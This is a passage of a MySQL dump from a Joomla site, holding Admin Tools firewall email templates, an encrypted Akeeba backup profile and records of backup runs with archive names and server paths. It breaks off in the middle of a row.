-- Table structure for table `fz6t4_admintools_waftemplates`
--

DROP TABLE IF EXISTS `fz6t4_admintools_waftemplates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_waftemplates` (
  `admintools_waftemplate_id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `reason` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` varchar(10) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '*',
  `subject` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `template` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `enabled` tinyint NOT NULL DEFAULT '1',
  `email_num` tinyint unsigned NOT NULL,
  `email_numfreq` tinyint unsigned NOT NULL,
  `email_freq` enum('','second','minute','hour','day') CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_on` datetime DEFAULT NULL,
  `created_by` bigint NOT NULL DEFAULT '0',
  `modified_on` datetime DEFAULT NULL,
  `modified_by` bigint NOT NULL DEFAULT '0',
  PRIMARY KEY (`admintools_waftemplate_id`),
  UNIQUE KEY `fz6t4_admintools_waftemplate_keylang` (`reason`(100),`language`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_waftemplates`
--

LOCK TABLES `fz6t4_admintools_waftemplates` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_waftemplates` DISABLE KEYS */;
INSERT INTO `fz6t4_admintools_waftemplates` VALUES (1,'all','*','Security exception on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that a security exception was detected on your site, [SITENAME], with the following details:</p>\r\n<p>IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]</p>\r\n<p>If this kind of security exception repeats itself, please log in to your site\'s back-end and add this IP address to your Admin Tools\'s Web Application Firewall feature in order to completely block the misbehaving user.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>',1,5,1,'hour','2014-04-14 14:36:34',800,'2014-04-14 14:42:38',800),(2,'user-reactivate','*','User account temporarily blocked on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We have detected several failed attempts to log in with user account [USER] on our site [SITENAME]. As a result, our system has automatically put a temporary block on the user account on [DATE].</p>\r\n<p>If you believe that you are getting this message in error, i.e. it was you who accidentally tried logging in with the wrong password, please click on the following link to lift the temporary block from your user account again:<br /><a href=\"[ACTIVATE]\">[ACTIVATE]</a></p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you have a user account in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>',1,0,0,'','2014-04-24 14:44:49',800,NULL,0),(3,'adminloginfail','*','Failed administrator login for user [USER] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that user <strong>[USER]</strong> did <strong>not</strong> log in successfully to the administrator back-end area of your site, [SITENAME]. <span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Further information:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this is expected you do not need to do anything about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>',1,5,1,'hour','2015-07-27 13:52:45',800,'2015-07-27 13:58:31',800),(4,'adminloginsuccess','*','User [USER] logged in on [SITENAME] administrator area','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that user [USER] has just logged in to the administrator back-end area of your site, [SITENAME]. Further information:</p>\r\n<p>Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p>* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this is expected you do not need to do anything about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>',1,5,1,'hour','2015-07-27 13:58:08',800,NULL,0),(5,'ipautoban','*','Automatic IP blocking notification for [IP] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that the IP address [IP] is now blocked from accessing your site, [SITENAME]<span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">, with the following details:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]<br />Banned until: [UNTIL]</p>\r\n<p>If this is your own IP address and you can no longer access your site please <a href=\"http://akee.ba/lockedout\">follow our instructions</a> to temporarily disable Admin Tools\' Web Application Firewall and clear the automatic IP ban.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>',1,5,1,'hour','2015-07-27 14:20:00',800,NULL,0),(6,'configmonitor','*','Configuration options for [AREA] modified on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that the configuration options for [AREA] on your site, [SITENAME], have been modified by user [USER]. More details about the origin of this change as follows:</p>\n<p>IP Address: [IP] (IP Lookup: [LOOKUP])<br />User Agent: [UA]</p>\n<p>If this change was not made by you or an administrator user you trust please review your site immediately as this would be an indication of hacking activity.</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n</div>',1,0,0,'','2016-12-15 10:46:00',800,'2016-12-15 10:46:00',800),(7,'criticalfiles','*','Critical file modified on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that one or more critical files have been modified on your site, [SITENAME]. The list of files modified on your site is as follows:</p>\n[INFO]\n<h3>Should I be worried?</h3>\n<p>Critical files, in the context of this email, are the files most usually targeted by hackers upon successful hacking of a site. These files can also be modified for legitimate reasons, for example when you save your site\'s Global Configuration or when you update Joomla! or one of its templates.</p>\n<p>You should NOT worry if you received this email after you, or another administrator you trust, performed any of the following changes on your site:</p>\n<ul>\n	<li>Restored the site from a backup</li>\n	<li>Modified the Global Configuration</li>\n	<li>Updated Joomla!</li>\n	<li>Updated a site template</li>\n</ul>\n<p>If this message was not sent to you as the result of such a desirable and expected change please review your site immediately as this would be an indication of hacking activity.</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n</div>',1,0,0,'','2017-04-05 13:15:00',800,'2017-04-05 13:15:00',800),(8,'superuserslist','*','Super Users were added to [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>\nWe would like to notify you that we detected the suspicious addition of one or more Super User accounts to your site, [SITENAME]. These new Super User accounts do not seem to have been created through the regular means, i.e. Joomla\'s &ldquo;Users&rdquo; page. Therefore they have been blocked. The new Super User accounts detected <strong>and blocked</strong> are:\n</p>\n[INFO]\n<p>\n<h3>Do I need to worry?</h3>\n<p>\nSuper User accounts have full access to your site. They can modify all content, without any restriction. They can also install software which can access or modify every aspect of your site, including arbitrary files, database content and configuration settings. Only grant Super User access to people you trust.\n</p>\n<p>\nIf you are receiving this email it means that these Super User accounts were created outside Joomla\'s &ldquo;Users&rdquo; page. Typically this means that a hacker found a way to bypass your site\'s or your server\'s security and tried to surreptitiously create Super User accounts for themselves. For this reason these accounts were blocked, i.e. they cannot be used to log into your site.\n</p>\n<p>\nIt is possible, however, that you do receive this email in error: if you or another Super User did intend to create these Super User accounts and used a third party tool to do that. If this is the case then do not worry. Just log in to your site\'s administrator backend with your own Super User account, go to the Users page, edit the users listed further above in this email and unblock them.\n</p>\n<p>\nIf you or another Super User did NOT intend to create these Super Users we recommend auditing your site and your server for any other signs of anomalous activity.\n</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n</div>',1,0,0,'','2017-04-06 09:50:00',800,'2017-04-06 09:50:00',800),(9,'rescueurl','*','Rescue URL requested on [SITENAME] for [USER]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that user [USER] has requested a Rescue URL for your site, [SITENAME]. If you made that request yourself please click on the following link, or copy and paste the URL to your browser. This will let you log in to the administrator backend of your site where you can modify unblock yourself and / or change Admin Tools\' configuration. The Rescue URL is:</p>\n<p><a href=\"[RESCUEURL]\" rel=\"alternate\">[RESCUEURL]</a></p>\n<p>The information towards the end of this email lets you know what to do once you are logged into your site\'s backend.</p>\n<h3>I have no idea why I\'m receiving this email</h3>\n<p>Look under \"What is the Rescue URL\" further down. You <strong>DO NOT</strong> need to take any action and you <strong>DO NOT</strong> need to worry.</p>\n<h3>Who requested the Rescue URL?</h3>\n<p>Username: [USER]<br />IP Address: [IP] ([LOOKUP])<br />User Agent: [UA]</p>\n<p> </p>\n<h3>What is the Rescue URL?</h3>\n<p>Sometimes an overzealous Admin Tools configuration can result in accidentally blocking you, a Super User from the site. Normally that would require you to rename the file of Admin Tools\' system plugin to unblock yourself. This is a bit complicated and susceptible to errors.</p>\n<p>The Rescue URL feature works around that. By accessing a special URL when you are blocked out of the site you are sent this email. The URL in this email is only valid for the same browser and IP address that made the request and only for a limited amount of time. Accessing it will get you to a <em>temporarily</em> unblocked administrator login page. This lets you access the administrator backend of your site to unblock yourself and / or modify Admin Tools settings.</p>\n<p>By default, this feature is enabled on all installations of Admin Tools. Moreover, a message about accessing the Rescue URL is displayed by default when someone gets blocked UNLESS you set up a \"Custom message\" in the Configure WAF page of Admin Tools. If you have no idea why you received this message it\'s probably because someone saw the default IP blocked message and guessed your Super User email correctly. Don\'t worry though, what they did is completely useless since they would also need access to your email account and your Super User password to access your site, i.e. they would need to have already hacked you. As it\'s already documented, we strongly recommend that you change the \"Custom message\" to make it less obvious that your site is protected by Admin Tools. If you do not wish to use the Rescue URL feature -and are OK manually renaming files per the documentation when you get blocked- go to Extensions, Plugins and edit the options of the Admin Tools system plugin. You\'ll see an option for Rescue URL. Set it to No to disable this feature.</p>\n<h3>What to do after logging in?</h3>\n<p>If your IP is blocked by Admin Tools go to Components, Admin Tools and click the big Unblock My IP button at the top of the page.</p>\n<p>If you keep getting your IP blocked without you doing anything suspicious to the best of your knowledge, the IP blocked is always the same but different than the one reported by <a href=\"http://www.ip-adress.eu/\">http://www.ip-adress.eu/ </a><em>and</em> <a href=\"https://www.whatismyip.com/\">https://www.whatismyip.com/</a> then your site might be behind a CDN or a reverse proxy. In this case, additionally to the instructions above, please go to Components, Admin Tools, Web Application Firewall, Configure WAF, click on the Basic Protection Features tab. Set the \"Enable IP workarounds\" option to Yes - no matter what the automatically detected recommendation is.</p>\n<p>If, however, your real IP address as reported by the two tool listed above keeps getting banned you should troubleshoot the reason of the ban. Go to Components, Admin Tools, Web Application Firewall, Security Exceptions Log and check the Reason and Target URL for the entries which have your IP address in the IP address field. If you are not sure what that means, please <a href=\"https://www.akeeba.com/support/admin-tools.html\" rel=\"alternate\">file a support ticket</a> remembering to copy the information from the Security Exceptions Log. Kindly note that you need to have an active subscription to receive support.</p>\n<p>If you have forgotten your Administrator Secret URL parameter go to Components, Admin Tools, Web Application Firewall, Configure WAF, click on the Basic Protection Features tab and find the \"Administrator secret URL parameter\" option. Change or remove all of the text in that box to reset or unset, respectively, this feature.</p>\n<h3>What to do if I still cannot log in to my site?</h3>\n<p>There are two cases where the Rescue URL feature, or renaming the Admin Tools system plugin\'s file, will not help you. These are the two cases where Admin Tools has created a <em>server</em> configuration file, meaning that you are blocked by <em>your server</em>, not Admin Tools.</p>\n<p>The first is the <strong>Administrator password protection</strong> feature. Please delete the files named <code>.htaccess</code> and <code>.htpasswd</code> from your site\'s <code>administrator</code> directory. </p>\n<p>The other case is when you\'ve used the <strong>.htaccess Maker</strong> feature of Admin Tools. In this case there\'s a <code>.htaccess</code> file in your site\'s root. You may want to replace its contents with the <a href=\"https://raw.githubusercontent.com/joomla/joomla-cms/staging/htaccess.txt\" rel=\"alternate\">default Joomla! .htaccess file content</a>.</p>\n<p>In both cases you should not that the files have names beginning with a dot. That makes them <em>hidden</em>. You will need to enable the display of hidden files to edit / delete those files. If you are unsure how to do that please ask your host and tell them that you need to edit/delete <em>hidden</em> files. Usually they will point out an option in their hosting control panel\'s file manager. </p>\n<p>In any other case your issue is unrelated to Admin Tools. Do you have another security plugin on your site? If you do, check its settings. If not, check with your host. More often than not hosts have their own server security systems which can block you out of your site.</p>\n</div>\n</div>',1,1,1,'minute','2017-06-20 09:50:00',800,'2017-06-20 09:50:00',800),(10,'criticalfiles_global','*','Critical file modified on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that one or more critical files that you decided to monitor have been modified on your site, [SITENAME]. The list of files modified on your site is as follows:</p>\n[INFO]\n<p>If this message was not sent to you as the result of such a desirable and expected change please review your site immediately as this would be an indication of hacking activity.</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n</div>',1,0,0,'','2017-04-05 13:15:00',800,'2017-04-05 13:15:00',800);
/*!40000 ALTER TABLE `fz6t4_admintools_waftemplates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_ak_profiles`
--

DROP TABLE IF EXISTS `fz6t4_ak_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_ak_profiles` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `configuration` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `filters` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `quickicon` tinyint NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_ak_profiles`
--

LOCK TABLES `fz6t4_ak_profiles` WRITE;
/*!40000 ALTER TABLE `fz6t4_ak_profiles` DISABLE KEYS */;
INSERT INTO `fz6t4_ak_profiles` VALUES (1,'Default Backup Profile','###AES128###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','',1);
/*!40000 ALTER TABLE `fz6t4_ak_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_ak_stats`
--

DROP TABLE IF EXISTS `fz6t4_ak_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_ak_stats` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `backupstart` timestamp NULL DEFAULT NULL,
  `backupend` timestamp NULL DEFAULT NULL,
  `status` enum('run','fail','complete') CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'run',
  `origin` varchar(30) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'backend',
  `type` varchar(30) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'full',
  `profile_id` bigint NOT NULL DEFAULT '1',
  `archivename` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `absolute_path` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `multipart` int NOT NULL DEFAULT '0',
  `tag` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `backupid` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `filesexist` tinyint NOT NULL DEFAULT '1',
  `remote_filename` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `total_size` bigint NOT NULL DEFAULT '0',
  `frozen` tinyint(1) DEFAULT '0',
  `instep` tinyint(1) DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_fullstatus` (`filesexist`,`status`),
  KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_ak_stats`
--

LOCK TABLES `fz6t4_ak_stats` WRITE;
/*!40000 ALTER TABLE `fz6t4_ak_stats` DISABLE KEYS */;
INSERT INTO `fz6t4_ak_stats` VALUES (1,'Backup taken on Saturday, 04 November 2017 22:59','','2017-11-04 19:59:37','2017-11-04 20:24:09','complete','backend','full',1,'site-www.3s-technologies.com.tr-20171104-225937.jpa','/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/administrator/components/com_akeeba/backup/site-www.3s-technologies.com.tr-20171104-225937.jpa',0,'backend','id1',0,NULL,57964534,0,0),(2,'Backup taken on Sunday, 05 November 2017 13:21','Crash\'den sonra çalışan versiyon - Joomla 3.81','2017-11-05 10:21:36','2017-11-05 11:06:00','complete','backend','full',1,'site-www.3s-technologies.com.tr-20171105-132136.jpa','/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/administrator/components/com_akeeba/backup/site-www.3s-technologies.com.tr-20171105-132136.jpa',0,'backend','id2',0,NULL,59164600,0,0),(3,'Backup taken on Wednesday, 14 February 2018 08:02 - Joomla 3.8.5','','2018-02-14 05:04:01','2018-02-14 05:12:26','complete','backend','full',1,'site-www.3s-technologies.com.tr-20180214-080401.jpa','/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/administrator/components/com_akeeba/backup/site-www.3s-technologies.com.tr-20180214-080401.jpa',0,'backend','id3',0,NULL,58185564,0,0),(4,'Backup taken on Monday, 16 September 2019 08:48','','2019-09-16 05:48:46','2019-09-16 